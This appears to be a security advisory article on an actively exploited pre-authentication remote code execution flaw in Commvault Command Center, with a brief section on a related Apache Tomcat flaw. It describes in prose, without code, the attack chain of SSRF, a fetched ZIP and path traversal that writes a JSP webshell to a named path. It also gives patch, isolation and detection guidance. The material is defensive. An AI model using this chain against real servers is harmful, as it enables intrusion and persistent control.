Organizations using Commvault’s backup and recovery software are under immediate threat due to an actively exploited pre-authenticated remote code execution (RCE) vulnerability, tracked as CVE-2025-34028. The flaw, which affects on-premise deployments, allows attackers to execute arbitrary code without authentication, potentially leading to full system compromise. A proof-of-concept (PoC) exploit has been publicly released, accelerating exploitation attempts globally[1].
Executive Summary for Security Leaders
The Commvault RCE vulnerability (CVE-2025-34028) poses a critical risk to enterprises and managed service providers. With a CVSS score of 9.0–10.0, it enables unauthenticated attackers to achieve remote code execution via path traversal and server-side request forgery (SSRF). Affected versions include Commvault Command Center 11.38.0 through 11.38.19, with fixes available in versions 11.38.20 and 11.38.25[2].
TL;DR:
- CVE-2025-34028: Pre-auth RCE in Commvault Command Center (CVSS 9.0–10.0)
- Affected Versions: 11.38.0–11.38.19 (Windows/Linux)
- Exploit: Uses SSRF and path traversal to deploy JSP webshells
- PoC Available: Released by watchTowr Labs on GitHub
- Mitigation: Upgrade to 11.38.20+ or isolate Command Center
Technical Analysis of CVE-2025-34028
The vulnerability exploits the deployWebpackage.do endpoint in Commvault Command Center. Attackers craft malicious ZIP files hosted on external servers, which the vulnerable system fetches due to an SSRF flaw. Path traversal (../../) is then used to write a JSP webshell to /reports/MetricsUpload/shell/.tmp/dist-cc/shell.jsp, granting persistent access[3].
watchTowr Labs’ PoC demonstrates the end-to-end attack chain, including:
- SSRF to retrieve attacker-controlled ZIP
- Path traversal to bypass directory restrictions
- Automatic webshell deployment with SYSTEM/root privileges
Detection and Mitigation
Organizations should immediately:
| Action | Details |
|---|---|
| Patch | Upgrade to Commvault 11.38.20 or later |
| Network Controls | Isolate Command Center from external access |
| Monitoring | Search for anomalous ZIP downloads or JSP executions |
Detection artifacts include HTTP requests to deployWebpackage.do with external URLs and files written to /reports/MetricsUpload/. watchTowr provides an artifact generator for SIEM rules[4].
Related Threat: Apache Tomcat RCE (CVE-2025-24813)
Simultaneously, attackers are exploiting CVE-2025-24813 in Apache Tomcat (versions 9.0.0-M1 to 11.0.2). This RCE leverages partial PUT requests to inject malicious payloads, though exploitation requires non-default configurations. GreyNoise reports 4 unique IPs targeting U.S. systems[5].
Conclusion
The Commvault vulnerability represents a severe threat to backup infrastructure, a frequent target for ransomware groups. Immediate patching is critical, supplemented by network segmentation and log analysis. The concurrent Tomcat exploitation underscores the need for comprehensive vulnerability management across all enterprise systems.
References
- “Commvault RCE Vulnerability Exploited—PoC Released,” GBHackers Security, 2025.
- Commvault Security Advisory CV_2025_04_1, 2025.
- watchTowr Labs, “Commvault PreAuth RCE Exploit,” GitHub, 2025.
- “Critical Commvault RCE Vulnerability Fixed,” HelpNet Security, 2025.
- “Active Exploitation of Apache Tomcat RCE,” GreyNoise, 2025.
